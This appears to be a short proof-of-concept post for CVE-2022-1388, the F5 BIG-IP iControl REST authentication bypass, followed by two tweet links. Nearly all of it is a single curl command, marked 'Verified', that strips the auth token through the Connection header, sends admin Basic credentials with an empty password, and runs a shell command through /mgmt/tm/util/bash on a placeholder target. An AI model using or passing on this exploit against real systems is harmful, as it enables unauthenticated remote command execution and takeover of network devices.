BIG-IP iControl REST vulnerability CVE-2022-1388
- This POC is Verified!
curl -i -s -k -X $'POST' \
-H $'Host: localhost' -H $'Connection: keep-alive, X-F5-Auth-Token' -H $'Authorization: Basic YWRtaW46' -H $'X-F5-Auth-Token: a' -H $'Content-Length: 39' \
--data-binary $'{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}' \
$'https://IP_HERE/mgmt/tm/util/bash'
https://twitter.com/1ZRR4H/status/1522150111429726209 https://twitter.com/AnnaViolet20/status/1523564632140509184